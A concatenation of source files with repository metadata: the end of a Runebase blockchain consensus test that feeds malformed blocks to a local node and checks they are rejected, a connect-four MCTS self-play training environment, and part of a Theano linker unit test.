self.update_block("57p2", [tx, tx1, tx2, tx3, tx4]) # b56p2 - copy b57p2, duplicate two non-consecutive tx's self.log.info("Reject a block with two duplicate transactions in the Merkle Tree (but with a valid Merkle Root)") self.move_tip(55) b56p2 = copy.deepcopy(b57p2) self.blocks["b56p2"] = b56p2 assert_equal(b56p2.hash, b57p2.hash) assert_equal(len(b56p2.vtx), 6) b56p2 = self.update_block("b56p2", [tx3, tx4]) self.sync_blocks([b56p2], success=False, reject_reason='bad-txns-duplicate', reconnect=True) self.move_tip("57p2") self.sync_blocks([b57p2], True) self.move_tip(57) self.sync_blocks([b57], False) # The tip is not updated because 57p2 seen first self.save_spendable_output() # Test a few invalid tx types # # -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) # \-> ??? (17) # # tx with prevout.n out of range self.log.info("Reject a block with a transaction with prevout.n out of range") self.move_tip(57) b58 = self.next_block(58, spend=out[17]) tx = CTransaction() assert(len(out[17].vout) < 42) tx.vin.append(CTxIn(COutPoint(out[17].sha256, 42), CScript([OP_TRUE]), 0xffffffff)) tx.vout.append(CTxOut(0, CScript([OP_TRUE]))) tx.calc_sha256() b58 = self.update_block(58, [tx]) self.sync_blocks([b58], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True) # tx with output value > input value self.log.info("Reject a block with a transaction with outputs > inputs") self.move_tip("57p2") b59 = self.next_block(59) tx = self.create_and_sign_transaction(out[17], int(INITIAL_BLOCK_REWARD+1) * COIN) b59 = self.update_block(59, [tx]) self.sync_blocks([b59], success=False, reject_reason='bad-txns-in-belowout', reconnect=True) # reset to good chain self.move_tip(57) b60 = self.next_block(60, spend=out[17]) self.sync_blocks([b60], True) self.save_spendable_output() # Test BIP30 # # -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) # \-> b61 (18) # # Blocks are not allowed to contain a transaction whose id matches that of an earlier, # not-fully-spent transaction in the same chain. To test, make identical coinbases; # the second one should be rejected. # # RUNEBASE: Since we enable BIP34 from block 0, this BIP30 test is no longer relevant. This test has therefore been removed. #self.log.info("Reject a block with a transaction with a duplicate hash of a previous transaction (BIP30)") #self.move_tip(60) #b61 = self.next_block(61, spend=out[18]) #b61.vtx[0].vin[0].scriptSig = b60.vtx[0].vin[0].scriptSig # Equalize the coinbases #b61.vtx[0].rehash() #b61 = self.update_block(61, []) #assert_equal(b60.vtx[0].serialize(), b61.vtx[0].serialize()) #self.sync_blocks([b61], success=False, reject_reason='bad-txns-BIP30', reconnect=True) # Test tx.isFinal is properly rejected (not an exhaustive tx.isFinal test, that should be in data-driven transaction tests) # # -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) # \-> b62 (18) # self.log.info("Reject a block with a transaction with a nonfinal locktime") self.move_tip(60) b62 = self.next_block(62) tx = CTransaction() tx.nLockTime = 0xffffffff # this locktime is non-final tx.vin.append(CTxIn(COutPoint(out[18].sha256, 0))) # don't set nSequence tx.vout.append(CTxOut(0, CScript([OP_TRUE]))) assert(tx.vin[0].nSequence < 0xffffffff) tx.calc_sha256() b62 = self.update_block(62, [tx]) self.sync_blocks([b62], success=False, reject_reason='bad-txns-nonfinal') # Test a non-final coinbase is also rejected # # -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) # \-> b63 (-) # self.log.info("Reject a block with a coinbase transaction with a nonfinal locktime") self.move_tip(60) b63 = self.next_block(63) b63.vtx[0].nLockTime = 0xffffffff b63.vtx[0].vin[0].nSequence = 0xDEADBEEF b63.vtx[0].rehash() b63 = self.update_block(63, []) self.sync_blocks([b63], success=False, reject_reason='bad-txns-nonfinal') # This checks that a block with a bloated VARINT between the block_header and the array of tx such that # the block is > MAX_BLOCK_BASE_SIZE with the bloated varint, but <= MAX_BLOCK_BASE_SIZE without the bloated varint, # does not cause a subsequent, identical block with canonical encoding to be rejected. The test does not # care whether the bloated block is accepted or rejected; it only cares that the second block is accepted. # # What matters is that the receiving node should not reject the bloated block, and then reject the canonical # block on the basis that it's the same as an already-rejected block (which would be a consensus failure.) # # -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) # \ # b64a (18) # b64a is a bloated block (non-canonical varint) # b64 is a good block (same as b64 but w/ canonical varint) # self.log.info("Accept a valid block even if a bloated version of the block has previously been sent") self.move_tip(60) regular_block = self.next_block("64a", spend=out[18]) # make it a "broken_block," with non-canonical serialization b64a = CBrokenBlock(regular_block) b64a.initialize(regular_block) self.blocks["64a"] = b64a self.tip = b64a tx = CTransaction() # use canonical serialization to calculate size script_length = 1000000 - len(b64a.normal_serialize()) - 69 script_output = CScript([b'\x00' * script_length]) tx.vout.append(CTxOut(0, script_output)) tx.vin.append(CTxIn(COutPoint(b64a.vtx[1].sha256, 0))) b64a = self.update_block("64a", [tx]) assert_equal(len(b64a.serialize()), 1000000 + 8) self.sync_blocks([b64a], success=False, reject_reason='non-canonical ReadCompactSize()') # bitcoind doesn't disconnect us for sending a bloated block, but if we subsequently # resend the header message, it won't send us the getdata message again. Just # disconnect and reconnect and then call sync_blocks. # TODO: improve this test to be less dependent on P2P DOS behaviour. node.disconnect_p2ps() self.reconnect_p2p() self.move_tip(60) b64 = CBlock(b64a) b64.vtx = copy.deepcopy(b64a.vtx) assert_equal(b64.hash, b64a.hash) assert_equal(len(b64.serialize()), 1000000) self.blocks[64] = b64 b64 = self.update_block(64, []) self.sync_blocks([b64], True) self.save_spendable_output() # Spend an output created in the block itself # # -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) # self.log.info("Accept a block with a transaction spending an output created in the same block") self.move_tip(64) b65 = self.next_block(65) tx1 = self.create_and_sign_transaction(out[19], out[19].vout[0].nValue) tx2 = self.create_and_sign_transaction(tx1, 0) b65 = self.update_block(65, [tx1, tx2]) self.sync_blocks([b65], True) self.save_spendable_output() # Attempt to spend an output created later in the same block # # -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) # \-> b66 (20) self.log.info("Reject a block with a transaction spending an output created later in the same block") self.move_tip(65) b66 = self.next_block(66) tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue) tx2 = self.create_and_sign_transaction(tx1, 1) b66 = self.update_block(66, [tx2, tx1]) self.sync_blocks([b66], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True) # Attempt to double-spend a transaction created in a block # # -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) # \-> b67 (20) # # self.log.info("Reject a block with a transaction double spending a transaction created in the same block") self.move_tip(65) b67 = self.next_block(67) tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue) tx2 = self.create_and_sign_transaction(tx1, 1) tx3 = self.create_and_sign_transaction(tx1, 2) b67 = self.update_block(67, [tx1, tx2, tx3]) self.sync_blocks([b67], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True) # More tests of block subsidy # # -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) # \-> b68 (20) # # b68 - coinbase with an extra 10 satoshis, # creates a tx that has 9 satoshis from out[20] go to fees # this fails because the coinbase is trying to claim 1 satoshi too much in fees # # b69 - coinbase with extra 10 satoshis, and a tx that gives a 10 satoshi fee # this succeeds # self.log.info("Reject a block trying to claim too much subsidy in the coinbase transaction") self.move_tip(65) b68 = self.next_block(68, additional_coinbase_value=10) tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 9) b68 = self.update_block(68, [tx]) self.sync_blocks([b68], success=False, reconnect=True) self.log.info("Accept a block claiming the correct subsidy in the coinbase transaction") self.move_tip(65) b69 = self.next_block(69, additional_coinbase_value=10) tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 10) self.update_block(69, [tx]) self.sync_blocks([b69], True) self.save_spendable_output() # Test spending the outpoint of a non-existent transaction # # -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) # \-> b70 (21) # self.log.info("Reject a block containing a transaction spending from a non-existent input") self.move_tip(69) b70 = self.next_block(70, spend=out[21]) bogus_tx = CTransaction() bogus_tx.sha256 = uint256_from_str(b"23c70ed7c0506e9178fc1a987f40a33946d4ad4c962b5ae3a52546da53af0c5c") tx = CTransaction() tx.vin.append(CTxIn(COutPoint(bogus_tx.sha256, 0), b"", 0xffffffff)) tx.vout.append(CTxOut(1, b"")) b70 = self.update_block(70, [tx]) self.sync_blocks([b70], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True) # Test accepting an invalid block which has the same hash as a valid one (via merkle tree tricks) # # -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21) # \-> b71 (21) # # b72 is a good block. # b71 is a copy of 72, but re-adds one of its transactions. However, it has the same hash as b72. self.log.info("Reject a block containing a duplicate transaction but with the same Merkle root (Merkle tree malleability") self.move_tip(69) b72 = self.next_block(72) tx1 = self.create_and_sign_transaction(out[21], 2) tx2 = self.create_and_sign_transaction(tx1, 1) b72 = self.update_block(72, [tx1, tx2]) # now tip is 72 b71 = copy.deepcopy(b72) b71.vtx.append(tx2) # add duplicate tx2 self.block_heights[b71.sha256] = self.block_heights[b69.sha256] + 1 # b71 builds off b69 self.blocks[71] = b71 assert_equal(len(b71.vtx), 4) assert_equal(len(b72.vtx), 3) assert_equal(b72.sha256, b71.sha256) self.move_tip(71) self.sync_blocks([b71], success=False, reject_reason='bad-txns-duplicate', reconnect=True) self.move_tip(72) self.sync_blocks([b72], True) self.save_spendable_output() # Test some invalid scripts and MAX_BLOCK_SIGOPS # # -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21) # \-> b** (22) # # b73 - tx with excessive sigops that are placed after an excessively large script element. # The purpose of the test is to make sure those sigops are counted. # # script is a bytearray of size 20,526 # # bytearray[0-19,998] : OP_CHECKSIG # bytearray[19,999] : OP_PUSHDATA4 # bytearray[20,000-20,003]: 521 (max_script_element_size+1, in little-endian format) # bytearray[20,004-20,525]: unread data (script_element) # bytearray[20,526] : OP_CHECKSIG (this puts us over the limit) self.log.info("Reject a block containing too many sigops after a large script element") self.move_tip(72) b73 = self.next_block(73) size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5 + 1 a = bytearray([OP_CHECKSIG] * size) a[MAX_BLOCK_SIGOPS - 1] = int("4e", 16) # OP_PUSHDATA4 element_size = MAX_SCRIPT_ELEMENT_SIZE + 1 a[MAX_BLOCK_SIGOPS] = element_size % 256 a[MAX_BLOCK_SIGOPS + 1] = element_size // 256 a[MAX_BLOCK_SIGOPS + 2] = 0 a[MAX_BLOCK_SIGOPS + 3] = 0 tx = self.create_and_sign_transaction(out[22], 1, CScript(a)) b73 = self.update_block(73, [tx]) assert_equal(get_legacy_sigopcount_block(b73), MAX_BLOCK_SIGOPS + 1) self.sync_blocks([b73], success=False, reject_reason='bad-blk-sigops', reconnect=True) # b74/75 - if we push an invalid script element, all previous sigops are counted, # but sigops after the element are not counted. # # The invalid script element is that the push_data indicates that # there will be a large amount of data (0xffffff bytes), but we only # provide a much smaller number. These bytes are CHECKSIGS so they would # cause b75 to fail for excessive sigops, if those bytes were counted. # # b74 fails because we put MAX_BLOCK_SIGOPS+1 before the element # b75 succeeds because we put MAX_BLOCK_SIGOPS before the element self.log.info("Check sigops are counted correctly after an invalid script element") self.move_tip(72) b74 = self.next_block(74) size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42 # total = 20,561 a = bytearray([OP_CHECKSIG] * size) a[MAX_BLOCK_SIGOPS] = 0x4e a[MAX_BLOCK_SIGOPS + 1] = 0xfe a[MAX_BLOCK_SIGOPS + 2] = 0xff a[MAX_BLOCK_SIGOPS + 3] = 0xff a[MAX_BLOCK_SIGOPS + 4] = 0xff tx = self.create_and_sign_transaction(out[22], 1, CScript(a)) b74 = self.update_block(74, [tx]) self.sync_blocks([b74], success=False, reject_reason='bad-blk-sigops', reconnect=True) self.move_tip(72) b75 = self.next_block(75) size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42 a = bytearray([OP_CHECKSIG] * size) a[MAX_BLOCK_SIGOPS - 1] = 0x4e a[MAX_BLOCK_SIGOPS] = 0xff a[MAX_BLOCK_SIGOPS + 1] = 0xff a[MAX_BLOCK_SIGOPS + 2] = 0xff a[MAX_BLOCK_SIGOPS + 3] = 0xff tx = self.create_and_sign_transaction(out[22], 1, CScript(a)) b75 = self.update_block(75, [tx]) self.sync_blocks([b75], True) self.save_spendable_output() # Check that if we push an element filled with CHECKSIGs, they are not counted self.move_tip(75) b76 = self.next_block(76) size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5 a = bytearray([OP_CHECKSIG] * size) a[MAX_BLOCK_SIGOPS - 1] = 0x4e # PUSHDATA4, but leave the following bytes as just checksigs tx = self.create_and_sign_transaction(out[23], 1, CScript(a)) b76 = self.update_block(76, [tx]) self.sync_blocks([b76], True) self.save_spendable_output() # Test transaction resurrection # # -> b77 (24) -> b78 (25) -> b79 (26) # \-> b80 (25) -> b81 (26) -> b82 (27) # # b78 creates a tx, which is spent in b79. After b82, both should be in mempool # # The tx'es must be unsigned and pass the node's mempool policy. It is unsigned for the # rather obscure reason that the Python signature code does not distinguish between # Low-S and High-S values (whereas the bitcoin code has custom code which does so); # as a result of which, the odds are 50% that the python code will use the right # value and the transaction will be accepted into the mempool. Until we modify the # test framework to support low-S signing, we are out of luck. # # To get around this issue, we construct transactions which are not signed and which # spend to OP_TRUE. If the standard-ness rules change, this test would need to be # updated. (Perhaps to spend to a P2SH OP_TRUE script) self.log.info("Test transaction resurrection during a re-org") self.move_tip(76) b77 = self.next_block(77) tx77 = self.create_and_sign_transaction(out[24], 10 * COIN) b77 = self.update_block(77, [tx77]) self.sync_blocks([b77], True) self.save_spendable_output() b78 = self.next_block(78) tx78 = self.create_tx(tx77, 0, 9 * COIN) b78 = self.update_block(78, [tx78]) self.sync_blocks([b78], True) b79 = self.next_block(79) tx79 = self.create_tx(tx78, 0, 8 * COIN) b79 = self.update_block(79, [tx79]) self.sync_blocks([b79], True) # mempool should be empty assert_equal(len(self.nodes[0].getrawmempool()), 0) self.move_tip(77) b80 = self.next_block(80, spend=out[25]) self.sync_blocks([b80], False, force_send=True) self.save_spendable_output() b81 = self.next_block(81, spend=out[26]) self.sync_blocks([b81], False, force_send=True) # other chain is same length self.save_spendable_output() b82 = self.next_block(82, spend=out[27]) self.sync_blocks([b82], True) # now this chain is longer, triggers re-org self.save_spendable_output() # now check that tx78 and tx79 have been put back into the peer's mempool mempool = self.nodes[0].getrawmempool() assert_equal(len(mempool), 2) assert(tx78.hash in mempool) assert(tx79.hash in mempool) # Test invalid opcodes in dead execution paths. # # -> b81 (26) -> b82 (27) -> b83 (28) # self.log.info("Accept a block with invalid opcodes in dead execution paths") b83 = self.next_block(83) op_codes = [OP_IF, OP_INVALIDOPCODE, OP_ELSE, OP_TRUE, OP_ENDIF] script = CScript(op_codes) tx1 = self.create_and_sign_transaction(out[28], out[28].vout[0].nValue, script) tx2 = self.create_and_sign_transaction(tx1, 0, CScript([OP_TRUE])) tx2.vin[0].scriptSig = CScript([OP_FALSE]) tx2.rehash() b83 = self.update_block(83, [tx1, tx2]) self.sync_blocks([b83], True) self.save_spendable_output() # Reorg on/off blocks that have OP_RETURN in them (and try to spend them) # # -> b81 (26) -> b82 (27) -> b83 (28) -> b84 (29) -> b87 (30) -> b88 (31) # \-> b85 (29) -> b86 (30) \-> b89a (32) # self.log.info("Test re-orging blocks with OP_RETURN in them") b84 = self.next_block(84) tx1 = self.create_tx(out[29], 0, 0, CScript([OP_RETURN])) tx1.vout.append(CTxOut(0, CScript([OP_TRUE]))) tx1.vout.append(CTxOut(0, CScript([OP_TRUE]))) tx1.vout.append(CTxOut(0, CScript([OP_TRUE]))) tx1.vout.append(CTxOut(0, CScript([OP_TRUE]))) tx1.calc_sha256() self.sign_tx(tx1, out[29]) tx1.rehash() tx2 = self.create_tx(tx1, 1, 0, CScript([OP_RETURN])) tx2.vout.append(CTxOut(0, CScript([OP_RETURN]))) tx3 = self.create_tx(tx1, 2, 0, CScript([OP_RETURN])) tx3.vout.append(CTxOut(0, CScript([OP_TRUE]))) tx4 = self.create_tx(tx1, 3, 0, CScript([OP_TRUE])) tx4.vout.append(CTxOut(0, CScript([OP_RETURN]))) tx5 = self.create_tx(tx1, 4, 0, CScript([OP_RETURN])) b84 = self.update_block(84, [tx1, tx2, tx3, tx4, tx5]) self.sync_blocks([b84], True) self.save_spendable_output() self.move_tip(83) b85 = self.next_block(85, spend=out[29]) self.sync_blocks([b85], False) # other chain is same length b86 = self.next_block(86, spend=out[30]) self.sync_blocks([b86], True) self.move_tip(84) b87 = self.next_block(87, spend=out[30]) self.sync_blocks([b87], False) # other chain is same length self.save_spendable_output() b88 = self.next_block(88, spend=out[31]) self.sync_blocks([b88], True) self.save_spendable_output() # trying to spend the OP_RETURN output is rejected b89a = self.next_block("89a", spend=out[32]) tx = self.create_tx(tx1, 0, 0, CScript([OP_TRUE])) b89a = self.update_block("89a", [tx]) self.sync_blocks([b89a], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True) self.log.info("Test a re-org of one week's worth of blocks (1088 blocks)") self.move_tip(88) LARGE_REORG_SIZE = 10 blocks = [] spend = out[32] for i in range(89, LARGE_REORG_SIZE + 89): b = self.next_block(i, spend, version=4) tx = CTransaction() script_length = 1000000 - len(b.serialize()) - 69 script_output = CScript([b'\x00' * script_length]) tx.vout.append(CTxOut(0, script_output)) tx.vin.append(CTxIn(COutPoint(b.vtx[1].sha256, 0))) b = self.update_block(i, [tx]) assert_equal(len(b.serialize()), 1000000) blocks.append(b) self.save_spendable_output() spend = self.get_spendable_output() self.sync_blocks(blocks, True, timeout=480) chain1_tip = i # now create alt chain of same length self.move_tip(88) blocks2 = [] for i in range(89, LARGE_REORG_SIZE + 89): blocks2.append(self.next_block("alt" + str(i), version=4)) self.sync_blocks(blocks2, False, force_send=True) # extend alt chain to trigger re-org block = self.next_block("alt" + str(chain1_tip + 1), version=4) self.sync_blocks([block], True, timeout=480) # ... and re-org back to the first chain self.move_tip(chain1_tip) block = self.next_block(chain1_tip + 1, version=4) self.sync_blocks([block], False, force_send=True) block = self.next_block(chain1_tip + 2, version=4) self.sync_blocks([block], True, timeout=480) time.sleep(1) self.log.info("Reject a block with an invalid block header version") b_v1 = self.next_block('b_v1', version=1) self.sync_blocks([b_v1], success=False, force_send=True, reject_reason='bad-version(0x00000001)') self.move_tip(chain1_tip + 2) b_cb34 = self.next_block('b_cb34', version=4) b_cb34.vtx[0].vin[0].scriptSig = b_cb34.vtx[0].vin[0].scriptSig[:-1] b_cb34.vtx[0].rehash() b_cb34.hashMerkleRoot = b_cb34.calc_merkle_root() b_cb34.solve() self.sync_blocks([b_cb34], success=False, reject_reason='block height mismatch in coinbase', force_send=True) # Helper methods ################force_send def add_transactions_to_block(self, block, tx_list): [tx.rehash() for tx in tx_list] block.vtx.extend(tx_list) # this is a little handier to use than the version in blocktools.py def create_tx(self, spend_tx, n, value, script=CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])): return create_tx_with_script(spend_tx, n, amount=value, script_pub_key=script) # sign a transaction, using the key we know about # this signs input 0 in tx, which is assumed to be spending output n in spend_tx def sign_tx(self, tx, spend_tx): scriptPubKey = bytearray(spend_tx.vout[0].scriptPubKey) if (scriptPubKey[0] == OP_TRUE): # an anyone-can-spend tx.vin[0].scriptSig = CScript() return (sighash, err) = SignatureHash(spend_tx.vout[0].scriptPubKey, tx, 0, SIGHASH_ALL) tx.vin[0].scriptSig = CScript([self.coinbase_key.sign_ecdsa(sighash) + bytes(bytearray([SIGHASH_ALL]))]) def create_and_sign_transaction(self, spend_tx, value, script=CScript([OP_TRUE])): tx = self.create_tx(spend_tx, 0, value, script) self.sign_tx(tx, spend_tx) tx.rehash() return tx def next_block(self, number, spend=None, additional_coinbase_value=0, script=CScript([OP_TRUE]), solve=True, *, version=4): if self.tip is None: base_block_hash = self.genesis_hash block_time = int(time.time()) + 1 else: base_block_hash = self.tip.sha256 block_time = self.tip.nTime + 1 # First create the coinbase height = self.block_heights[base_block_hash] + 1 coinbase = create_coinbase(height, self.coinbase_pubkey) coinbase.vout[0].nValue += additional_coinbase_value coinbase.rehash() if spend is None: block = create_block(base_block_hash, coinbase, block_time, version=version) else: coinbase.vout[0].nValue += spend.vout[0].nValue - 1 # all but one satoshi to fees coinbase.rehash() block = create_block(base_block_hash, coinbase, block_time, version=version) tx = self.create_tx(spend, 0, 1, script) # spend 1 satoshi self.sign_tx(tx, spend) self.add_transactions_to_block(block, [tx]) block.hashMerkleRoot = block.calc_merkle_root() if solve: block.solve() self.tip = block self.block_heights[block.sha256] = height assert number not in self.blocks self.blocks[number] = block return block # save the current tip so it can be spent by a later block def save_spendable_output(self): self.log.debug("saving spendable output %s" % self.tip.vtx[0]) self.spendable_outputs.append(self.tip) # get an output that we previously marked as spendable def get_spendable_output(self): self.log.debug("getting spendable output %s" % self.spendable_outputs[0].vtx[0]) return self.spendable_outputs.pop(0).vtx[0] # move the tip back to a previous block def move_tip(self, number): self.tip = self.blocks[number] # adds transactions to the block and updates state def update_block(self, block_number, new_transactions): block = self.blocks[block_number] self.add_transactions_to_block(block, new_transactions) old_sha256 = block.sha256 block.hashMerkleRoot = block.calc_merkle_root() block.solve() # Update the internal state just like in next_block self.tip = block if block.sha256 != old_sha256: self.block_heights[block.sha256] = self.block_heights[old_sha256] del self.block_heights[old_sha256] self.blocks[block_number] = block return block def bootstrap_p2p(self, timeout=10): """Add a P2P connection to the node. Helper to connect and wait for version handshake.""" self.nodes[0].add_p2p_connection(P2PDataStore()) # We need to wait for the initial getheaders from the peer before we # start populating our blockstore. If we don't, then we may run ahead # to the next subtest before we receive the getheaders. We'd then send # an INV for the next block and receive two getheaders - one for the # IBD and one for the INV. We'd respond to both and could get # unexpectedly disconnected if the DoS score for that error is 50. self.nodes[0].p2p.wait_for_getheaders(timeout=timeout) def reconnect_p2p(self, timeout=60): """Tear down and bootstrap the P2P connection to the node. The node gets disconnected several times in this test. This helper method reconnects the p2p and restarts the network thread.""" self.nodes[0].disconnect_p2ps() self.bootstrap_p2p(timeout=timeout) def sync_blocks(self, blocks, success=True, reject_reason=None, force_send=False, reconnect=False, timeout=60): """Sends blocks to test node. Syncs and verifies that tip has advanced to most recent block. Call with success = False if the tip shouldn't advance to the most recent block.""" self.nodes[0].p2p.send_blocks_and_test(blocks, self.nodes[0], success=success, reject_reason=reject_reason, force_send=force_send, timeout=timeout, expect_disconnect=reconnect) if reconnect: self.reconnect_p2p(timeout=timeout) if __name__ == '__main__': FullBlockTest().main()
46.509804
184
0.584598
75c36dda4c76a28b49d5c811c321b54af326ede4
2,795
py
Python
connectfour/agent/environment.py
Lando-L/connect-four
35be8b41443bd357b2b30678237a4581f3543aac
[ "MIT" ]
null
null
null
connectfour/agent/environment.py
Lando-L/connect-four
35be8b41443bd357b2b30678237a4581f3543aac
[ "MIT" ]
null
null
null
connectfour/agent/environment.py
Lando-L/connect-four
35be8b41443bd357b2b30678237a4581f3543aac
[ "MIT" ]
null
null
null
import os from typing import Tuple import numpy as np from connectfour.agent.memory import AgentMemory from connectfour.agent.model import AgentModel from connectfour.game import gamestate from connectfour.tools.mcts.tree import MCTSTree class AgentEnvironment: def __init__(self, observation_space: Tuple, action_space: int, value_space: int) -> None: self.action_space = action_space self.observation_space = observation_space self.value_space = value_space self.memory = AgentMemory() self.model = AgentModel(observation_space, action_space, value_space) self.tree = MCTSTree(gamestate.step, gamestate.valid_actions, self.model.evaluate) self.histories = [] def evaluate(self, num_simulations: int, exploration_constant: float, temperature: float) -> None: state = gamestate.empty() episode = [] outcome = None while outcome is None: self.tree.reset(state) probabilities = self.tree.simulate(num_simulations, exploration_constant, temperature, state.player) actions = np.array([probabilities.get(i, 0) for i in range(self.action_space)]) action = np.random.choice(np.arange(self.action_space), p=actions) episode.append((state, actions)) state, outcome = gamestate.step(state, action) for state, action in episode: self.memory.store((state, action, outcome)) self.memory.store(( gamestate.GameState( board=np.fliplr(state.board), depths=state.depths, player=state.player ), action, outcome )) def improve(self, num_samples: int, batch_size: int, epochs: int) -> None: states, actions, outcomes = self.memory.sample(num_samples) history = self.model.train(states, actions, outcomes, batch_size, epochs) self.histories.append(history) def iterate(self, num_iterations: int, checkpoint: int, path: str, num_simulations: int, exploration_constant: float, temperature: float, samples: int, batch_size: int, epochs: int) -> None: for i in range(1, num_iterations + 1): self.evaluate(num_simulations, exploration_constant, temperature) self.improve(samples, batch_size, epochs) if i % checkpoint == 0: print(f'Saving model at checkpoint {i}') self.model.save(os.path.join(path, f'checkpoint_{i}_model.h5')) self.model.save(os.path.join(path, 'model.h5')) self.memory.save(os.path.join(path, 'memory.pickle'))
36.298701
112
0.620036
1d56ac8bd6e9f69dda6177d90df70ed873910b3f
6,263
py
Python
Theano-master/theano/gof/tests/test_link.py
JuliusSchwartz/FlowMO
e221d989914f906501e1ad19cd3629d88eac1785
[ "MIT" ]
95
2019-05-14T20:55:26.000Z
2022-03-26T13:32:42.000Z
Theano-master/theano/gof/tests/test_link.py
JuliusSchwartz/FlowMO
e221d989914f906501e1ad19cd3629d88eac1785
[ "MIT" ]
7
2019-11-25T08:24:47.000Z
2021-09-12T13:29:14.000Z
Theano-master/theano/gof/tests/test_link.py
JuliusSchwartz/FlowMO
e221d989914f906501e1ad19cd3629d88eac1785
[ "MIT" ]
24
2019-05-14T20:55:38.000Z
2022-01-16T11:29:39.000Z
from __future__ import absolute_import, print_function, division from copy import deepcopy import unittest import numpy import theano from theano.gof import graph from theano.gof.graph import Variable, Apply, Constant from theano.gof.type import Type from theano.gof.op import Op from theano.gof import fg from theano.gof.link import * # noqa from theano.compat import cmp def as_variable(x): assert isinstance(x, Variable) return x class TDouble(Type): def filter(self, data): return float(data) tdouble = TDouble() def double(name): return Variable(tdouble, None, None, name=name) class MyOp(Op): __props__ = ("nin", "name", "impl") def __init__(self, nin, name, impl=None): self.nin = nin self.name = name if impl: self.impl = impl def make_node(self, *inputs): assert len(inputs) == self.nin inputs = [as_variable(i) for i in inputs] for input in inputs: if input.type is not tdouble: raise Exception("Error 1") outputs = [double(self.name + "_R")] return Apply(self, inputs, outputs) def __str__(self): return self.name def perform(self, node, inputs, out_): out, = out_ out[0] = self.impl(*inputs) add = MyOp(2, 'Add', lambda x, y: x + y) sub = MyOp(2, 'Sub', lambda x, y: x - y) mul = MyOp(2, 'Mul', lambda x, y: x * y) div = MyOp(2, 'Div', lambda x, y: x / y) def notimpl(self, x): raise NotImplementedError() raise_err = MyOp(1, 'RaiseErr', notimpl) def inputs(): x = double('x') y = double('y') z = double('z') return x, y, z def perform_linker(fgraph): lnk = PerformLinker().accept(fgraph) return lnk def FunctionGraph(inputs, outputs): e = fg.FunctionGraph(inputs, outputs) return e class TestPerformLinker(unittest.TestCase): def test_thunk(self): x, y, z = inputs() e = mul(add(x, y), div(x, y)) fn, i, o = perform_linker(FunctionGraph([x, y, z], [e])).make_thunk() i[0].data = 1 i[1].data = 2 fn() assert o[0].data == 1.5 def test_function(self): x, y, z = inputs() e = mul(add(x, y), div(x, y)) fn = perform_linker(FunctionGraph([x, y, z], [e])).make_function() assert fn(1.0, 2.0, 3.0) == 1.5 def test_constant(self): x, y, z = inputs() y = Constant(tdouble, 2.0) e = mul(add(x, y), div(x, y)) fn = perform_linker(FunctionGraph([x], [e])).make_function() assert fn(1.0) == 1.5 def test_input_output_same(self): x, y, z = inputs() fn = perform_linker(FunctionGraph([x], [x])).make_function() assert 1.0 is fn(1.0) def test_input_dependency0(self): x, y, z = inputs() a, d = add(x, y), div(x, y) e = mul(a, d) fn = perform_linker(FunctionGraph(*graph.clone([x, y, a], [e]))).make_function() assert fn(1.0, 2.0, 9.0) == 4.5 def test_skiphole(self): x, y, z = inputs() a = add(x, y) r = raise_err(a) e = add(r, a) fn = perform_linker(FunctionGraph(*graph.clone([x, y, r], [e]))).make_function() assert fn(1.0, 2.0, 4.5) == 7.5 def wrap_linker(fgraph, linkers, wrapper): lnk = WrapLinker(linkers, wrapper).accept(fgraph) return lnk class TestWrapLinker(unittest.TestCase): def test_0(self): nodes = [] def wrap(i, node, th): nodes.append(node.op) x, y, z = inputs() e = mul(add(x, y), div(x, y)) fn, i, o = wrap_linker( FunctionGraph([x, y, z], [e]), [PerformLinker(allow_gc=False)], wrap).make_thunk() i[0].data = 1 i[1].data = 2 fn() assert nodes == [div, add, mul] assert o[0].data is None def test_1(self): nodes = [] def wrap(i, node, th): nodes.append(node.op) th() x, y, z = inputs() e = mul(add(x, y), div(x, y)) fn, i, o = wrap_linker( FunctionGraph([x, y, z], [e]), [PerformLinker(allow_gc=False)], wrap).make_thunk() i[0].data = 1 i[1].data = 2 fn() assert nodes == [div, add, mul] assert o[0].data == 1.5 def test_sort_schedule_fn(): import theano from theano.gof.sched import sort_schedule_fn, make_depends x = theano.tensor.matrix('x') y = theano.tensor.dot(x[:5] * 2, x.T + 1).T def str_cmp(a, b): return cmp(str(a), str(b)) # lexicographical sort linker = 